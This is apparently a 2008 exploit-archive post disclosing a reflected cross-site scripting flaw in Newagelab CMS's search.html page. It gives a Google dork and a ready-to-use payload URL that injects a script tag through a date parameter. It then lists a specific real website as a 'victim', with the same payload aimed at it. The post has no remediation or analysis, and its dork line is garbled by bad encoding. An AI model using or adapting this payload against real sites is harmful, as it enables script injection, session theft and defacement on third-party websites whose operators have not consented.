newagelab-xss.txt
Posted on 10 November 2008
######################################################### --------------------------------------------------------- Portal Name: Newagelab Cms Vendor : http://newagelab.com Vulnerable File : search.html Dork: (c) òÁÚÒÁÂÏÔÁÎÏ NewAgeLab Author : Pouya_Server , Pouya.s3rver@Gmail.com Vulnerability : XSS (Cross site scripting) --------------------------------------------------------- ######################################################### http://www.site.com/search.html?s%5Boper%5D=or&s%5Bdate%5D%5Btype%5D=within&s%5Bdate%5D%5Bwithin%5D=0&s%5Bdate%5D%5Bold%5D=newer&s%5Bdate%5D%5Bday%5D="><script>alert('xss%20By%20Pouya')</script><h1>Xss%20By%20Pouya</h1 > --------------------------------- Victem : http://opelukraine.com/search.html?s%5Boper%5D=or&s%5Bdate%5D%5Btype%5D=within&s%5Bdate%5D%5Bwithin%5D=0&s%5Bdate%5D%5Bold%5D=newer&s%5Bdate%5D%5Bday%5D="><script>alert('xss%20By%20Pouya')</script><h1>Xss%20By%20Pouya</h1 >
